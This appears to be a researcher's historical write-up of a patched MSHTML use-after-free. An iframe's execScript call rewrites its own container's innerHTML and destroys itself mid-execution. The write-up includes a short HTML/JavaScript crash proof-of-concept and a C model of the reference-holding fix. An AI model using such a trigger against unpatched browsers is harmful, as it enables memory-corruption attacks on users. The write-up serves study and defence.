I found this while experimenting with self-referential DOM mutations. If an iFrame uses execScript to call innerHTML on its own containing element in the parent, it destroys itself mid-execution, leading to an exploitable DEP fault. The innerHTML assignment is the critical ingredient — outerHTML, removeChild, and similar methods do not trigger the same path.
<div id="iFrameContainer">
<iframe name="iFrame" width="300" height="50" border="1"></iframe>
</div>
<input type="button" onclick="main();" value="CrashMe">
<script language="JavaScript">
function main()
{
iFrame.execScript('parent.document.getElementById("iFrameContainer").innerHTML = 1');
}
</script>
The innerHTML assignment tears down the iFrame while the iFrame’s own script is still executing inside execScript. MSHTML ends up executing code at a heap address that has already been freed and reused, triggering a DEP violation. !msec.exploitable classified this as EXPLOITABLE.
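As an added illustration (not code from the original post, and not MSHTML code), the following C model shows the engine-side pattern that closes this class of bug: holding a reference on the calling frame for the duration of an execScript callout, so a synchronous innerHTML teardown of its container cannot destroy it before the callout returns. The Frame and Container types and run_scenario are constructed for this model only.

```c
#include <stdlib.h>
/* Toy model, not MSHTML code: a frame's script engine calls out into the parent
 * document, and that callout may destroy the frame's own container, and with it
 * the frame, before the callout has returned. */
typedef struct Frame Frame;
typedef struct Container { Frame *child; } Container;  /* one strong reference */
struct Frame {
    int refcount, destroyed; /* destroyed is set instead of free(f) so the model can report a UAF safely */
    int *script_state;       /* engine state touched after every callout */
};
static Frame *frame_create(void) {
    Frame *f = calloc(1, sizeof *f);
    f->refcount = 1;         /* the container's reference */
    f->script_state = calloc(1, sizeof *f->script_state);
    return f;
}
static void frame_addref(Frame *f) { f->refcount++; }
static void frame_release(Frame *f) {
    if (--f->refcount > 0) return;
    free(f->script_state); f->script_state = NULL;
    f->destroyed = 1;        /* a real engine would free(f) here */
}
/* innerHTML = 1 on the container: the child frame is dropped synchronously. */
static void container_set_inner_html(Container *c) {
    Frame *old = c->child;
    c->child = NULL;
    if (old) frame_release(old);
}
typedef void (*script_fn)(Container *parent);
/* execScript: run the script, then touch the frame's own state. Returns 0 if the
 * frame was still valid, -1 if it would have dereferenced a destroyed frame.
 * `guard` enables the fix: an extra reference held across the callout. */
static int frame_exec_script(Frame *f, script_fn script, Container *parent, int guard) {
    int rc;
    if (guard) frame_addref(f);
    script(parent);                          /* may tear down f's container */
    if (f->destroyed) rc = -1;               /* the use-after-free path */
    else { (*f->script_state)++; rc = 0; }   /* post-callout bookkeeping */
    if (guard) frame_release(f);             /* last reference goes after the last use */
    return rc;
}
static void self_destruct_script(Container *parent) { container_set_inner_html(parent); }
/* Runs the scenario with or without the guard; returns frame_exec_script's result. */
int run_scenario(int guard) {
    Container parent = { frame_create() };
    Frame *f = parent.child;
    int rc = frame_exec_script(f, self_destruct_script, &parent, guard);
    free(f);                                 /* the struct the model kept alive */
    return rc;
}
```

Without the guard the callout destroys the frame mid-execution and the post-callout access lands on a dead object; with the guard the same script runs to completion and the teardown is deferred to the final release.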
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.